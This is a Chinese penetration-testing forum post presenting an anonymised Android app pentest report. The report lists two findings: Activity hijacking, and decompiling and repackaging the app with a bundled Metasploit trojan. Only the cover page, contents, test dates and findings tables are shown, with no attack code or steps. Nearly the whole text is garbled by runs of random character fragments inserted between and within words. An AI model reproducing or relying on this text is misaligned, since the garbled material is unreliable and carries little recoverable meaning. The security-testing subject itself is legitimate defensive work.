找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 5385|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
+ U9 h# ~2 G/ I3 Z9 E . {. z4 |) P4 o! w

+ t- a5 Q5 F! _' D2 ? 9 [ ]/ r4 U* Q/ ?+ S
$ @/ I! u- R* N! |$ c1 { 2 d2 u! Z* Z/ w

* Q% ? Y6 ^/ I% w% P% u 3 `- P: q) U2 {8 Y9 A
7 l! A: l3 F2 h9 q % S2 `2 }1 f% u8 A2 D1 c5 [

0 y8 S8 g1 {. p9 S$ Z9 }1 h. n# r# s* } 文档编号:                , c' I1 K! w3 q2 H, C & z7 M& ?) w0 P

, N$ A# y- v! m$ V' Z' v! r4 W @+ v" c* t7 R8 Q, E$ Z: y+ c5 {) q

- c$ |$ r# x+ R' e3 u* _, E) W ) j& U7 D' @9 n, d: N   ! {$ e4 h: [( ^. E4 ^7 {2 R% ]: B1 o- x. }1 [& Z

! @' w, @; L! d7 F 7 f4 f8 b. M9 F; B4 C0 ~

) H: a5 B5 r: X1 f2 ]4 N- o& `. N+ K$ v" \) u   / ]/ n4 y( n5 {4 l% ` ( v- L H$ r, J: k; [/ s1 ?1 S

! u" u2 @7 C8 Q 3 m1 ]6 n6 ~+ X V! b3 [5 [

" [# W# D# Z5 m" h9 Q* L0 ^ 5 k4 {6 D4 \$ _# [   ( ?, U6 a/ |# q# d6 K& S: L, B$ K; |) U

) C* r8 x% D* q e7 ~2 \6 c' \: z3 u- I

4 X, N( B- |4 c* W- V w! V& {# @, j2 v$ c, ?" L   ! q( [4 ~" b* J6 G" q8 p 2 ~* g2 O% {3 C8 k! i4 G! w

, C, G7 d z0 K( o v! E ! [0 d* n9 e$ Q; Y2 j' v5 [

1 i4 T0 N: z0 x( \8 D- w8 [ ; f# r$ j; V3 {: R7 ]# Z2 K   , q+ j* D b4 Q1 G" {+ s# |1 N7 y3 a. \0 T

4 Z/ G$ _, y6 B) l: \0 R) L ; h N/ Y1 s) |! R

& u. I; D; ]8 ? 9 [. o0 X6 v: I- z- d' p+ f 某某某APP渗透测试 , B$ G: y+ ^5 ]1 F8 d! K% }. X$ t) ]/ ~ r' G: b2 J

6 j5 V: x: Q3 g8 g" Y' w1 A r + I" q" f9 }9 h1 e2 [7 n

0 h7 [4 F8 @9 } # v' {1 M, Y5 `( F" E8 h   ( |- m7 n5 R; ^2 t% ~; v- h' B8 G8 i9 Y: M! B; u* I4 z0 I

6 }5 n' H4 D9 H' V x4 S5 a " v$ U- E- v* w, j# ~

8 G, Y9 g& C$ \8 ?/ | . V% z# Y9 ^' Y7 K2 N$ {6 V) o, W   . b. ?; F$ X( I! [ 3 l) k! D( a9 I/ z- M

J- G& e6 y! p# `, D ; M. j/ R Z' P9 e! E

2 H: y, D. N2 o, O1 T ' |# k3 D# u8 i5 I6 |/ P. r   6 |5 v; s T& ` m1 d & B* l% f/ l$ g

6 d- M' c" J9 {9 B# m + e% n9 T2 p& V( F# M

0 L& C6 q) |9 R/ z/ `- k 8 T" L, v& }4 C2 W& o0 n   4 O, ]8 w. a* I: b2 G" }+ ?6 | 3 f& Y, a; I! a* H5 ^3 F* |4 N

/ h7 `/ i% E, _) X- x# E o8 D% J4 O: }- l" n5 ^

6 B" v- d9 Z2 M0 f: q+ ? 9 b# M( _4 z, D8 }7 ? 技 术 报 告 - m/ @9 [+ g8 d: f, I6 _3 } $ r x. r. B1 |+ A6 h" O* `

$ i0 N. q9 O+ @' p ; C; M' G, s5 F

) ]+ o+ y! l5 c. t5 O/ t! e6 `. ]2 g% f3 T. n4 s0 u   ; o$ Z5 K/ Y2 K' \ 9 b1 k; |" U' R9 r5 ]3 A

" y; {3 u, ^4 X7 ` C' \! Q4 t& z0 B4 [ w

6 U7 Z7 A& S u1 { ( `6 Y2 ~; _: p/ w: H) [, @9 w   $ B2 m& l* N1 O9 ~+ E7 z0 I0 ` 5 ^7 t; M2 v) j7 e- x

: N! o. D) W9 G% v 2 n9 `7 ~' Q& H, u

- |. Q( j# O `& L' {; d. v% {0 o* V& d$ a2 J; `   , u) f' v' s# I ' U4 A# w0 M/ ?

7 g. T( a) ?3 v/ F: M; @, A 4 ^6 j! E! o1 w% ^

) Y! ]2 }. Z- ]& Z5 [ H, ^ 8 L1 n6 m% S8 K& j   0 {6 g% V O* y' ?3 A0 U3 z0 D 1 i- U4 u, v* e4 {7 [

% x+ R/ ?2 Y* D% Y# w* O 3 ^( z, n1 y3 u( R) @ m4 s

& m( D, Q; }, v& n& T4 ~; f 9 e8 j( S# D0 a. r8 X" ]/ W' O   8 H E8 U- N% i5 R8 J3 b$ J ! K* V" u5 w( o

/ } W7 N+ R9 Y h ' G8 Q" Z: Y, Q; P6 V

, o- j E6 Y. `0 G4 v1 E0 `/ r, w" q$ r/ g& p4 Y0 N0 z   * P4 h% y# |1 t1 {, k ]0 L$ }, P 6 O$ Y9 I( ~7 w2 A( Z8 _5 Z

& X+ t3 w* ~6 U( I* n# M9 P* W$ c0 E9 H C: ]: o, t3 o( i8 Q* k

m$ Y9 |8 H4 R L+ K% K" } ) K7 `! g7 `2 b' o P2 y   9 W+ ^* I" T1 b6 z) B [* z1 t / ~' p) X' ]& c+ u& b9 }

7 g2 B2 `4 J) ?: O + r( u1 F. z" i7 l/ J3 G! j

5 l' q3 X5 l L9 d3 l/ ], O- M. r! r# k8 \: e6 I3 }   6 S* g5 V# ^% L4 r& S 8 u$ |5 c1 S) p) D+ s

% |+ K4 z" a# {) K3 j. U. R/ \. g, P7 f) F . z' D; }4 |8 E _9 `; L$ U

" k7 W, C" }& L" h( q: B " b3 ^& _& @& ~8 E6 Y: r/ q) W( r   5 {, `) _6 j. Y' r% M6 N$ c ; u ~- K5 s& X& y9 }# S$ w/ c

4 W' ~2 k6 _( V' u2 `/ K- V7 \6 Y9 Q6 r2 ?! r* a$ T& L

9 c7 W' J" }0 S, m) U$ { : [: F3 a' Q+ |, x0 n; ~   * \: `& C& k/ Z# T$ I& x9 P) M 9 k: i7 J) Y- l( D$ ?

( S* x1 P6 R4 h6 d+ o! ]) T" ] ) Z* r2 W" ]: l# {4 L2 k x

3 N% P9 \* j4 m ( m$ p3 U/ x `. ~   / {' `/ G# }$ o0 j8 U: j & I" j) L! i3 `2 c* x& t: n

4 T! j @" s5 d# H9 L- U- E5 I! Z( K- Z1 f' Z: v ~

8 C# W1 \0 r( h4 B x 0 L/ G' @- d V- r6 ?/ T   7 N% m( r7 q* C0 K9 Z4 k* ]& K9 S K0 W' [% }

/ d% V: u$ w- P8 v/ w+ S- J0 D 6 k9 P6 M% b' L4 r% [

4 m0 [7 d, A' K2 O g% O- P * E% g1 @/ t9 M1 N   ' J$ t6 k2 b' Z' P$ X3 b 0 Y" \6 U% }; R

- F& d) I- L+ z* R' f; G/ f - u5 Q# _ l8 [% ?

; I9 y1 A( m9 e( h" N' w, {% Y" ^ W/ x   p" p, T& i4 ^2 o ' P0 J$ @! Z! q# a, d

% V; P3 T! e# m K / O. ^8 B2 o, W

, b# [" y& W- w' [& f) q& B ( T( ~7 q" g, ?. ?+ {3 a1 \   ( `/ s. {* J8 ]3 ]- f- o6 K( @6 U; M6 | K7 Y

- W$ U$ l4 I$ r# W* Y* @ $ `$ F: ]" [! _

# [) B8 m1 |! `3 d+ ]% R6 j( b8 l2 v6 ]( {   D; N; Y" _! l' {+ `: r ( S& \( j) z. {

6 \5 d6 j! _3 Q X( |0 p1 \ ) e5 I) q, ? S d1 R

' _" h* k- E6 @# C- } v z . Q r1 ]$ |) U7 G0 Y4 ]. M) `   3 v4 d/ P+ C; u4 r : \! ~ ?( L; P' B0 Q( k; D: j

3 d; \6 `+ G" L/ A/ X, D! I+ D# i - S* h6 h$ k6 J( C; I5 }" l( L M

1 l& L3 ]& M. ~1 U* o/ C6 r4 ~" e& t9 N   ! B& I& K0 R% G: |, x 8 B+ }/ v7 i9 a- Q! d7 u

3 w7 t/ F U$ u$ e% u* ?0 ^$ A/ C# x M7 h5 ~

/ ]7 W6 z! v2 |- ?) Y1 o 6 m9 {* \. y7 ?: \ 二〇二〇年 7 W+ q3 ~, ~9 c- h# y . ?0 G" X9 D( x" o

+ F; Y, B4 x% A @; F ' @& g- K9 r) V' V& |
2 I3 w# @6 m" ~ 3 R! ?. n( Q) P
# w9 r" ]- O- J0 [. Y5 L3 T $ X$ z- o: ^) h4 Z* C, \ O4 k3 | 3 B' O' K# ^+ U* F& @8 o2 T+ i l/ k$ J+ n+ B! }# t* J
; B; z# [" O' {' c; ]% a. o7 f8 m: Q
6 J4 P# k! w; ?+ _/ J: f! Z 1 W. I( Y( d, V/ r/ B
! d& e/ T0 o$ I) d ) P) A. A% C, S9 e. ~' L9 F! i B$ m0 R1 C' n3 m3 Y T5 T' u" R8 A# Y" T
5 @9 o/ G3 e0 o0 y9 m& S& a% F" l5 T- J) M

- Y" R$ G) k% J, v" B# Z1 V* Q . e5 A5 n1 v/ F0 u' z- H5 L 目 录 + @4 A* {; J' z! e! I- ?' h" d # V1 \7 S' R- z$ P2 X

7 W% s6 Q( z" K& _ / \+ r% V( c% u8 ~ % d! T4 c% _& J( E6 ~5 ~- m 8 j/ d9 G! h. R& D; s

# L, q' R* j S' h7 |4 ]! @+ o- d 5 d# x( T. x+ E E; k% @1 ?8 l   8 z* E! `" j! ^- c: ?( V) t( m! d- N$ l q, g

4 y$ K1 y) P7 W) |$ b5 [ 2 P c" X. y- R8 t* x4 N: R

! k3 z: S8 X5 n! P2 L 9 O5 E$ ?9 I: h& u 1 概述... 3 3 }' n2 }5 c! { a% n ; A/ Z0 _' z1 Q/ Y, |

0 C+ E8 X( {5 X0 j& c( a! ^1 _2 ~' d 3 O' a% n7 z" W" m( u4 v2 W

; E. f6 |/ ^7 R& \" ~% L8 H! d) l9 b6 j6 X h) [& Z% u9 l7 O! i 1.2测试时间... 3 / W; X& O7 o P% c c 1 b) o% X/ d% p& k2 R* [, C! I' \# ?

1 Z6 `. l3 L+ L$ g* ^, y 1 {$ C' R: f. h) N% _

; I/ }0 v3 k) g1 H 1 W; d7 n: }- J$ |4 U2 R 1.3测试对象... 3 * x* R! |: ~. o4 z; J$ S # D( c* [! l7 ]4 G0 F5 d# U" l

6 ^/ {0 `/ c: _' L. o, t * k) J2 h: i5 ^. Z

. R* L# ^/ n. \. V) J. R1 [# b1 I" K2 J( d 1.4测试结果... 3 ) o: M/ F; ~& V$ X- W' x0 E 3 x3 z8 f% ^2 ~

$ O9 L2 M f2 z 1 C2 r) z% d/ F/ ^. ` O2 {4 ?

& u0 g2 N, c3 t, a * f9 e/ ?* w' h, ? 2 检测结果... 4 $ @$ O2 ~: F# x8 ^% N9 t ) q( |* T; @% E

, h) z J4 m, \1 t" z, q% {; { / f9 B) s7 P: @" Y3 e' Y

, j% K+ I# k4 A# v+ [" N 6 c0 c! ^3 r" {4 L1 V, ^9 s( |2 _ 2.1 某某某... 4 . A: i- P$ a* q7 F3 Q, C. x$ ` z; c/ O# f$ f/ w7 j/ ~% W

& P* S. Q: D& @! B \: M( _) ^& h2 U0 j: _( q8 J5 u0 K2 X

; Z* d, u- g4 A, z7 @" }5 C0 @& s9 Q# m+ {9 |) }, ?/ e+ _7 { 2.1.1检测目标... 4 : \! ]7 {# G: O3 `3 x - r9 U; S$ l3 b2 x+ ]

( x z3 t. D" s( y5 P0 {5 L: C) a6 m" s

% c x! Z1 t1 A! K3 m. t ?6 L ^' P; h3 g 2.1.2检测结果... 4 $ k; E3 w, V5 f$ o# e 7 e9 i# r9 @# u

8 b( f' I: I6 J7 L . f9 N3 j4 y- i- t

1 k4 B# x) \ L0 s7 r3 n! g% L ? 2 v7 B3 F- I. H: m+ J7 t2 _$ i 2.1.2.1. 4 ' e/ B I$ K) I/ q0 S5 ^3 L1 o, C I, U " @$ I; o3 ^. w4 V: N8 n4 F

& t4 ~6 Q, G: s: Z0 v: b, Y! T9 O: U Z 1 `- V3 o' ?! V J, S4 Q. j

3 v2 f% n; a- `7 l 5 a; L! p2 w) A* I9 R 2.1.2.2. 6 3 y3 Q( Z0 H3 s* I& M' h7 D" g, x) V& h1 }

9 D, k3 Y7 w _) y+ v2 l) t, d2 s5 q% y% H! o- c8 x3 J

b8 u6 @2 e6 s! B1 P; z4 S* |0 W" o% U/ } ; C# ^+ n, R1 b9 k. g ) O6 L: ]+ M0 `5 ~* }* E' ^

' m1 d8 Y/ K0 u- h9 Z4 `+ R' F ' ` r' z0 f+ {) P4 y: L * B: T- k: \$ `; { " g6 R" O4 j. F( R
4 X- c6 X' I0 f$ l2 N ! D# B" A& m& ~, j Y( a6 W3 b
4 B3 p4 i* Z3 a4 @5 g. w5 X# S% k4 O ( s9 L' G# T) p: C7 b3 | 5 Q0 X& R ^- f1 T: I6 u, |

5 |4 U0 M# \. F0 h6 i/ E+ L" k( i 9 a8 R8 \# j' D5 m& A/ X; V# L6 V 1 概述 B- \- Q1 B+ n( G+ Q( }' a / h) D1 a5 W& y+ e

4 N# z$ L! [6 Z3 x: S0 E 5 f' [' q* i4 \ X: M

( f L2 ?6 K2 d! G3 c# d' { : s' ?+ h& p* j$ J( ?9 z! y 1.2测试时间 " t/ K" `) t+ y' Y: M3 M3 @: r0 o " U ^9 W4 ^ Y% v' h& f5 n- [9 ~. D

0 u5 z* S3 u7 @2 a1 g2 K1 W9 |: l6 c9 U+ d 3 F# [1 Q# C7 f1 y1 `4 j+ Y& T: o3 N5 M: O7 }0 r( l7 T5 ]: k9 F4 K& o8 r$ o5 t8 q- {: a* ~. l/ B0 D5 ]$ t% Y. n2 h2 O; S0 p3 H2 i& n. _9 e" w: ?% ~& }! [' d$ ^7 C u: q5 d% y/ F4 `: G5 I$ ?! Q I% N# ~0 q' }7 j7 l1 V0 o$ n. ]4 w7 q; V0 {4 F; k, s9 p$ t5 o6 p1 {, e8 s- N1 a. `. g& x8 `" Z/ F8 h& K$ i3 ~! a4 L% t% x& Z9 e! _% M6 r8 t9 N5 K8 ~1 s1 g5 u, h5 ] d- [ b* n7 u8 D" P* x/ Y3 g/ K- ~0 k' u: E1 }: d2 z/ S; B ]1 A3 X, W7 L5 p5 N" ]9 ]' M5 ^. u0 A9 j ~2 |# K: P; t6 X, W- `, X! M5 [% f4 r; E* {! |8 \! ]. z! O8 w( S) Q7 q3 w8 W9 F; u. m3 B. M; M, v; |4 z( t8 E( A, w8 e9 r1 A. A+ F& Q0 c3 s' d" a7 O* ~( Z7 D; |$ i, w* m1 R7 ^$ Q. t C
8 x6 y+ z) j O& H ( g- \$ X1 [( ]2 Z# i* S

, T5 h ]$ Y/ P5 m 0 {. X5 \+ u1 H 渗透测试时间 2 ]7 [, |# H! h" z0 |1 a4 m" g , n7 h4 R# x& N/ S

( N% F( B- K( i' K# K , h; ~* R" e# a& I9 _9 b% `: W
- K0 | E7 R7 D$ e# ~ n" t4 ~7 {1 m1 I# J# X

4 _7 v( R/ @6 m+ J$ l ! r2 C$ s6 T3 ~. q( V/ b 起始时间 2 D8 V! c2 C0 P5 p $ ?7 V- s, v( Y+ m) V' {* d

4 l+ \# c' G+ ]0 R( n! |3 _$ n * s" h h/ S! U9 q 		% U3 ^! L% ] W( E' E $ L: [3 C6 d( k; \( r

: _( |: h& Q% [$ v- w + |! X$ t7 m5 s& E3 U, s0 U8 f 202046 ( p. V7 K0 e+ ]' e/ y 2 ?6 c5 R$ G, I$ B1 Y

& }1 u. ]- }$ Y' P- [ F: h9 K3 @ s- }8 B2 a( h' E3 o7 o
4 X' a1 b6 L/ ], ~9 i! D* X + k+ w! y5 P8 I6 k. I+ @

% E8 k: ^, x% e7 R* {8 E; ^( E% t: c! }6 c3 p" q8 _4 U 结束时间 0 s" L" U. a% i; z% F8 k! ]7 n2 U 8 r* a. K! O/ U8 O

7 s: B/ s5 D; h* y7 s4 G 9 ?! l. l F5 C { 		$ \& k. `* N1 S2 J3 q+ W5 P$ J4 q 8 G/ e4 L7 T8 ~% z( g

& H. \0 k/ L" y q& {* E2 @ l; X S* W' }9 v+ Z l. M 202049 6 l: s& i7 _0 k6 { ' k3 T$ p8 ^" _! q

& @* ~0 P( a" K5 C* i$ [0 \ ' W# [4 X. ~+ M- e
; K. R$ D v) r2 D& t6 s6 ]* @3 x. t/ `

. D6 E6 f; ~% b . _+ B8 D7 L% d$ n) a, J- m 1.3测试对象 8 M/ p( Z+ F2 p8 K1 }$ v) h+ |1 \5 i7 J' p$ `

" l+ o+ G4 k. Q( {+ f+ p$ m & P/ s5 f8 I1 A2 F4 ]) N+ _4 X2 {4 I

/ L8 }- u7 n/ X # M1 ]% i: W6 U/ d 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: * ?5 j: i5 e1 s z ! m4 O0 d, I' h& \5 B" M

# U# X, _: X" q6 F4 b5 ^9 f. R % v9 y$ `4 B1 V4 M1 ]" x x

9 v' h& S! p9 Y 4 n2 ?9 \* c4 n3 O 1-1 检测对象 / E+ _( a7 V. A& o" Q( Z$ x1 W 3 t, H* m! O4 x/ H$ G ?

% j$ F c A8 a- t; J) Y0 w6 |$ L C+ D: S: T 2 T! h( j6 D6 w1 e: u: h9 h" r' W1 [$ h5 K0 l" o: M8 p$ m+ N8 \& \ d4 v$ x8 H& p8 z5 [! f9 `. V' p5 a/ m* v0 s* m2 ~5 p" A4 |1 V% }, `# T- ~/ Z# Z5 J& M/ Y! [- G% M+ Q5 t a# {) _! u2 B! f/ y" R1 u/ V. [8 ^. o" `" ~+ }. _% B3 x9 w. T) ^- @- d1 }9 x; o: t% i7 X4 i% C9 a' `4 L% ]1 h, {# g9 d, G# D% R) f/ ~1 |: C8 r6 A' _+ M' ~! r. Q5 ~% Q7 ?# c+ L# _, Z# B5 S N7 @, D/ S- m1 ~5 l' b& x" ]: k, d w% A S. V6 G- D% j9 @& I6 Z& V7 H. `- D: g2 g# F: p) d. _4 s: t# `: |4 {4 o& W+ R. S6 g3 ]2 V0 g8 y$ t+ K! _* y' Z0 ^9 C! ^' t9 b' \# G* { K7 t# w" f F) o, N0 X7 z: F0 ]/ T- V' a/ s% c% U& s$ m- X$ T9 B6 O) J" S. v& ]: q- d- }: g; z- ~ i* @1 |, O7 X* T# ? ^5 S& [- X7 d. F$ p4 U6 @5 [+ u E
$ H0 W0 l5 d7 w. _ {+ i+ o" l: T9 C% M; H( ]

$ L5 o( N( o% h& J* q& T 9 h5 [! { q3 [* c( G- | 序号 ) E8 h5 J) a- y* N5 H / A0 C4 s e# v

- O# [' D+ H. P: r8 G! k; |& _# f# F3 B- i2 V3 O 		0 \2 R e+ ]# A) G3 n# j9 B" X% w4 P6 O) _

& q( c% Z4 k' U8 B- U: j- y% L$ c% I8 z: Y1 r 测试对象 8 O4 ?2 ~ b- ^$ q3 b1 H7 Y+ Z4 P: M% Z8 Z 1 l0 ^) t$ g, \

! \& ~& \* [" b( W4 C: X0 i: {8 K9 v 6 h3 u, x8 w& g+ v5 u( s 		6 \! K- o/ @3 d& b) c : C( G$ D. |) s+ t* B2 L

2 b; `/ r# Z9 G4 F' C 5 E/ B4 P/ C9 R' V. d: I+ k 测试地址 ! l+ X4 d: L {: J/ ^8 j" }: |+ H5 l. G' [7 @+ [1 {

" }/ g* S0 x0 l$ J7 B' I8 s % T$ x6 D0 j9 f+ ]( Q3 ~ 		& j" q( s+ M7 S% y ; w$ _+ R! B6 d9 R8 J5 `

+ ~( m1 j6 [' E) V* K; l( d+ H7 g $ E+ B9 P5 L' o v& d6 v8 C7 c 安全漏洞 ; @3 I# {. Z. g& l+ H! i* T. M5 [' `0 }; g8 A( R3 C$ K" l1 a! @

( Y; N5 S" o5 ^6 P* m, E- K; a 5 [* z2 e: |; l
) `+ M, I9 B0 u( U ) p$ l+ m" t3 F1 a5 B; L

! ^5 L7 b( R6 q6 {$ a7 d" m0 a. P: `7 k' m! y 1 4 p1 Q* a! p9 o& j6 A 8 R7 Z' z! l- d( P

- i4 E# e& z( l7 W . A0 ^5 B* E+ ~ 		% M; v) L3 n! ^' e0 @0 L0 q . e* ]* ?9 m/ l1 q+ b8 z: d

4 _ `2 s! B/ x" M7 M/ j$ X" i9 K# d7 S3 g2 M 某某某安卓APP + N8 ~. O/ R6 y' {, J" j ' i" Y1 X/ V E

; f: ~" l2 ]5 M4 x0 e4 Q' _% w) N) m 6 d, F5 }7 K! n1 {7 C 		4 i3 W( _* e+ G 9 ^; w" A5 R4 w* u' E& l

3 e( e- ^# O9 I( ^, B+ n7 e' m6 `, q+ c+ L; i) \/ ^4 u9 e( B   1 k# X4 [) M( s 7 `# n; b3 {" d: J, I C/ _ j

7 h. l- h: O" ]4 |; a" R& G7 y7 o : D6 @% ^* D( v: |4 f/ x 		+ d; }/ A2 y* `7 {. P4 g- m+ ]* b . P0 S7 Y; \' \9 {

) N' D( t8 J1 q; j9 O7 T: N ( Q/ n* ~0 M$ x2 Z 2 6 \1 s% x0 N5 ]1 h: @ 1 L9 }( R% M8 A/ N! R

) H6 S& Y' t! z) O/ k' P$ W$ E" N1 D; o2 d
& P& G+ ?2 j# N/ i $ s1 ?3 h; r+ F$ p

4 F- K% C& H) L/ L 5 w% V7 t$ N5 y% X1 i- D, D @ 1.4测试结果 2 E% u5 j. I% I6 i- P5 q , Z' B5 a `$ K( ]' K

3 C. b; l: |' R' i+ I 6 |4 m- \3 K- f2 g+ G5 i

" m. z: t3 x3 N1 J 1 j- k1 w. O5 p1 g6 F/ ^( S! D* L6 U 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 K m' r" c4 C e' a% Y ; a( }( n6 u+ X

, U" x7 O3 Q" A" u# N/ B 8 V. D/ g' W* y* I6 y, n" p. \

- c( G/ l/ e1 k1 O8 p. p9 H& J # T3 [9 c4 {4 A1 x   $ o9 m# {. t) U. _4 d. g! W' g: D, z' b0 {. [2 b$ H5 ?

) H# l5 a4 a. R, J3 l 2 I3 L( H+ Q8 q* M; t$ I3 s% A: t
& }6 P4 @; Q; J, Q* o9 ~2 V7 m. x' F& r6 v; I4 p! z1 Y% o 9 r( i+ Q- E' M9 T( |8 y+ W- @1 x) S9 ] W8 a# o( X6 z, Z- w d0 B5 a0 }" E3 J. }+ V+ Y+ u3 {$ U3 v( G1 u3 W* a5 I' X( S- e6 b+ J. w: T. }0 L! i& ~2 r! } G! B3 D% _! \3 T! s+ |+ j% U" i4 l" j% d3 Q* d' T# B2 ?" e* w. o1 | W/ O- x- J3 l7 n0 V( f8 ?& a# K# E9 V7 c" N: h! e8 W& O' g. B9 F6 K# k* M# D8 R' c e7 B3 B6 ]- X9 D- |+ l4 F: }5 I. f0 x) d. e" K6 F- J7 \6 O% R( m" F9 I+ C0 E% d, Y a6 A8 B2 I: l8 Q+ h/ U2 p- _, X# K& I. W1 J2 q3 R6 B4 R% a- I% S% _) x4 w: b, t( N+ D9 H/ g0 Y9 X: E- r8 Z" D" Y7 P/ \$ C" l3 j5 V* j$ g6 t1 k+ O% G5 t1 V, y8 x1 @ |# |: T. i. i' ?. o8 \6 n6 e3 s b# c; m% \3 w. @- @2 J8 `. D- ?% J" y" R. D6 c; Y$ E) y/ r& X; h. b5 G* t! }) j% [5 @& Y0 C5 \, u% S! x! R/ R6 ^3 J8 P: _; m% b8 j- w& J& y) E' h& ?0 R9 p; v" \/ n0 e. \% { ?3 _7 }- _$ q6 [0 D) _9 {7 b( C$ w; V0 e7 r3 |3 g$ U0 J1 Y6 T0 z. i# l8 [3 h3 n& @; O! O0 `2 o' t6 I/ C8 H: W8 |6 d& `+ v; V- q8 b# ]% i& z% c! _" l! `) Q' l! J2 ~5 ]& m" c4 G1 U0 K1 Y/ i: {6 Y, a* g' d# I" c( P/ K/ R( o- n7 D) l0 x r9 l& h! X4 T: J8 |+ |8 s9 J( d1 [: E' G, E9 d- O1 h! R+ [2 U' I8 u Q& q4 ~8 j9 B6 D1 @. M, B: E y7 F+ S$ Y; W8 a5 U. p9 A6 `' s3 \5 U& d& d
8 R; ]7 ?+ e, C0 b4 ^% W) [5 C" D+ @- e3 m7 [% z

% d6 x0 M% M/ K$ Z 5 C1 u e9 ]$ V 序号 7 c: \, ^/ \+ Q: _1 I0 p" E9 R. h0 {* T

. |! N q2 ?! g. j' O* ]: D6 u 2 r& B+ u$ N' Q2 g8 x7 ]) t2 A 		1 q, e% w* H( I# Y ; U8 e5 v3 d- q& P; q Y* ?

5 M; p& `9 T% \4 r9 f% \ + v+ W, d+ @' K5 Z+ E/ A 系统名称 : ?' v- B5 t( _) j' o0 ?4 i4 X1 w ( ^5 p+ h w. p% q4 W

; s7 z) u" Q; N1 E& d5 d2 m% t4 R( B& P' ~% ` 		$ v8 ]; H; k' ?( j5 g1 @! T: K$ b & w. s5 d9 D4 i+ e

) ~* ]$ B) p2 }! f5 j: _8 |$ k N6 N& D! \+ h0 l/ v) A' ` 漏洞名称 % A. ]+ }8 J, M1 z) v$ u 5 g$ l; ~0 w, X3 e! J" N

+ r. j& v0 N1 J u) R* ~( G& _6 d; I- k 		7 }5 g) f- E0 U$ [ * L" D2 P+ L+ w. |

( O/ [5 J1 E. _" L6 P& `% h 2 T, n1 j6 z0 `' m$ Y2 k* [3 E 漏洞危害 7 F* t: I% C7 ]7 J: G- K - S; j3 y6 C% x# Q8 A' W" f" q

7 b: R7 d+ m1 O' f; g ! [( k7 a# R! z; D8 z' N9 { 		; l6 e; G& }" w' }7 P , A. L8 M0 k: \; W( h

' z% J8 @2 r4 W8 U5 W * [0 e0 o3 k4 V" G+ ? 修复结果 * \7 A$ V) m9 L. Y" T3 |/ ~/ g# V/ l D/ [

# U4 }; }4 g' C0 y' Z 0 b1 U' Y' V' V0 G* R/ d
/ a% R: {) B$ b' H& @# P7 Z8 R2 J" g' L8 j p4 s3 _

' @& Z2 m+ E. y# E3 q. Y; h - y Y0 r0 r# ~; J4 H 1 $ g( F; K. d! X* P- \1 Y$ d* @ i+ c6 s U

7 n$ b$ r$ b( w! ?" g4 @ 4 p$ l6 H; G- m6 t 		( i: Q- m0 t0 [# B+ O; Q) v* J8 }9 ?

+ M* K% L# Y2 T' j+ m / f. t" Q$ h& t8 B0 G0 C& o 某某某某某某APP ' ]0 F8 v9 s! x+ P2 D# n0 X # Z' a8 h2 O; w/ j0 j

/ ]3 Q L0 _- o- V9 i- q 4 f4 U& \7 T* R3 k, J% C% s 		9 Q' ?) ^0 ?( L$ B + x8 c! q% k- r' ]3 y0 F' c, \# W

( Z$ Q9 g! O- a0 V0 W# A& L ) [0 G8 E9 V2 Q& q7 G7 B$ M Activity 劫持 ' g# P9 k( _* M$ ? / r5 d$ G9 X& D0 ]* a) ]* g

+ u2 u. l0 _% |7 i & e$ i7 T+ @$ w7 g) ~/ M

. V7 j1 i9 P* o# ?) X; Y' { / C" {2 L: q4 w/ T+ R   ! }5 h, K# L4 y |* `1 d& ?& [; n8 G q( g- S y* u& w1 x

# i* J$ i- k7 J( e5 d( I& v/ R6 v ( {+ \! G+ i3 j: |: S 		3 o, n/ A* }6 r. o9 \ " I3 s& p9 z7 S

' F6 o. { |& O' N, b ! @$ K3 j2 @7 X( E9 p1 _$ V 7 u0 E' t3 q+ o ! K' y/ G( F2 `# G* H8 E

: \% r4 B! @' g5 n2 x$ R* [$ o7 X4 a 		3 E, b) _/ T1 q- O% n* z: z 7 S3 X. v* w+ H( Q8 O

# J% _, H/ k, \+ L9 _- r4 t- A6 [   & G/ a) J, S) G$ i- Y6 Z* h( ` 0 ~4 T% e4 H; Z+ ~

4 ~4 }8 v/ {' i- \$ O ; q- J( [% h! ]% a9 ?, W! E/ Y
) S7 [* ]4 C0 O2 V, R) e+ T) H- A: \9 `! b. U+ {$ }1 M

% ]! p. n- Y1 \. U+ M* P $ L2 r) X, v) x9 o! p) R/ X% k 2 ( y$ Q+ o+ m; {+ U* t2 D8 J% {/ k4 ~ % S. P* P) e C+ G

- ?$ V% L% T4 Q 0 |$ g+ _) J; X* x. n; S- ] } 		+ y4 Y) f4 t/ O X1 b 8 Y! Q" R$ n/ c2 ?; L; w& S

* b8 O1 J' w( `9 f2 k6 p " M+ w4 M# G! c: B$ W3 j$ G/ }' p4 n 某某某某某某APP , O; O+ k C; s8 X# s" s- e $ g+ o: S) O/ }8 t

* H& a8 @& Y4 o" S5 K 7 G+ @% G+ P6 Y7 V" z9 O& X$ l# v1 i- d: r 		9 N7 ]% y' y+ z0 f) i( K' |# @; V) w

% Z4 X- C v- x 3 W4 I2 A @# e% f0 { 反编译二次打包捆绑木马、篡改APP代码 % H5 `/ O- T4 R+ K4 S2 D' \- b0 M5 ?0 ]3 C7 T+ R" O5 E

& x; H' C. S- J+ A5 h# { y; C3 ?- k) J' C+ I- `( ^ 		* Y* [( @( P l* }: p. V" p% n" z, S- M- K: T" H) H+ _3 ?

" }" ] G; S3 e+ L- k) ^1 e0 U+ A* X # [9 f, V& d8 Q( o9 {+ \7 a% I / t4 h3 S! x5 b0 f& [& P . z; f9 F ~$ t

6 }" B" d9 I! K ' J" ~$ q- {3 d2 g, |- c0 u' z 		( W( s% e0 c( W# U" ?7 Q ' T# N- X1 _4 a0 X+ X- \

0 w1 u& e- o8 N _( X0 ^# F ) j h9 T; p. s7 K% G   : f! x9 k5 p; `2 { 0 t$ b! C) Y: z

! N! e* H( q$ C# Y4 w0 u z9 m, s4 Y . y; b r6 B2 h/ Y; f5 c
